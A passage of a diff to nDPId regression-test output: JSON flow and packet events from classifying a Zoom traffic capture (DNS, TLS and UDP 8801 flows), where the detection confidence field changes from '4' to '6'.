00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1569520471188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1569520471188,"pkt":"KDc3AG3IEBMx8Tl2CABFAABSclkAADcRjXvAqAEBwKgBdQA1x\/EAPsuKHCSBgAABAAEAAAAADHpvb21mcm45OW1tcgR6b29tAnVzAAABAAHADAABAAEAAKjAAARtXqBj"} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":280,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1569520471188,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfrn99mmr.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"109.94.160.99"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":280,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1569520471188,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": 
{"query":"zoomfrn99mmr.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"109.94.160.99"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471189,"flow_last_seen":1569520471189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520471189,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569520471189,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520471189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGatnAqAF1bV6gY9ZXAbsw+fmWAAAAALAC\/\/9csgAAAgQFtAEDAwUBAQgKJZziLAAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569520471220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520471220,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGd91tXqBjwKgBdQG71leHhddzMPn5l6ASqbBjhwAAAgQFrAQCCAp2KotLJZziLAEDAww="} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569520471220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520471220,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGauXAqAF1bV6gY9ZXAbsw+fmXh4XXdIAQECwrtgAAAQEICiWc4kt2KotL"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520471189,"flow_last_seen":1569520471221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520471221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520471189,"flow_last_seen":1569520471255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520471255,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":291,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520471189,"flow_last_seen":1569520471266,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520471266,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520471189,"flow_last_seen":1569520471221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520471221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520471189,"flow_last_seen":1569520471255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520471255,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":291,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520471189,"flow_last_seen":1569520471266,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520471266,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569520471399,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1569520471399,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEAA2VgAAAQEICiWc4viZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1569520471748,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":1569520471748,"pkt":"EBMx8Tl2KDc3AG3ICABFAACHYY4AAEARSPnAqAF1bV6gY+PXImEAcwEfAQACfUZNNf\/9ojRJXQ1tO1HolgAAAAAAAAACAHoAKgB6ACoAAABADhc935YCXvuVxCQMI1O\/y\/Bgvpncu9jEece5cy1sdfpDYvCDXrg+TanGp+bzCbMeQN8Pa7V1aoQPcx2bwfanLQAAAAA="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1569520471780,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1569520471780,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA\/ukJAADURu4xtXqBjwKgBdSJh49cAK4mJAgABfUZNNf\/9ojRJXQ1tO1HolgBaDj4AegAqAAAAAAAAAAA="} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1569520471780,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1569520471780,"pkt":"KDc3AG3IEBMx8Tl2CABFAAApukNAADURu6FtXqBjwKgBdSJh49cAFe6ZAwAAAAF2Ko10AFoOPgAAAAAA"} 00183{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":398,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1569520471784} 00356{"packet_event_id":1,"packet_event_name":"packet","packet_id":398,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1569520471780,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471915,"flow_last_seen":1569520471915,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471915,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1569520471915,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":1569520471915,"pkt":"EBMx8Tl2KDc3AG3ICABFAACHOsEAAEARb8bAqAF1bV6gY+zMImEAcx+TAQACgEJ0mpHOZDa3wq7Yfnt8kAAAAAAAAAACAHoA0QB6ANEAAABAz+pIvn76v2yDYA2gAvW2g1TH36+BBcgmmBwGC4A2voI37csLDeuB1cbZ5dS3SDby7ZAjUH7\/6+f4krtKebNFkQAAAAA="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471915,"flow_last_seen":1569520471915,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471915,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471915,"flow_last_seen":1569520471915,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471915,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1569520471939,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1569520471939,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA\/uqdAADURuydtXqBjwKgBdSJh7MwAK7AuAgABgEJ0mpHOZDa3wq7Yfnt8kABaDj8AegDRAAAAAAAAAAA="} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1569520471939,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1569520471939,"pkt":"KDc3AG3IEBMx8Tl2CABFAAApuqhAADURuzxtXqBjwKgBdSJh7MwAFUSkAwAAAAF2Ko4UAFoOPwAAAAAA"} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520473084,"flow_last_seen":1569520473084,"flow_idle_time":200000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520473084,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1569520473084,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1569520473084,"pkt":"EBMx8Tl2KDc3AG3ICABFAACJ4\/YAAEARxo7AqAF1bV6gY\/EjImEAde5DAQACOkSxT2rBSy0CI5EJ7ghSoQAAAAAAAAACAHoFYgB6BWIAAABAyr1YPP8KZ34wUqB9PR5Zle\/sBvgfAfGBqNzDFPjrnryOYaOvAtAdhsk5Sd978V5OWjrnwByNSAVBXX+sDOwgiv\/\/\/\/8KAA=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520473084,"flow_last_seen":1569520473084,"flow_idle_time":200000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520473084,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520473084,"flow_last_seen":1569520473084,"flow_idle_time":200000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520473084,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1569520473116,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1569520473116,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA\/vWBAADURuG5tXqBjwKgBdSJh8SMAK0WqAgABOkSxT2rBSy0CI5EJ7ghSoQBaDkQAegViAAAAAAAAAAA="} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1569520473116,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1569520473116,"pkt":"KDc3AG3IEBMx8Tl2CABFAAApvWFAADURuINtXqBjwKgBdSJh8SMAFalIAwAAAAF2KpKmAFoORAAAAAAA"} 
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469423,"flow_last_seen":1569520469433,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469423,"flow_last_seen":1569520469433,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
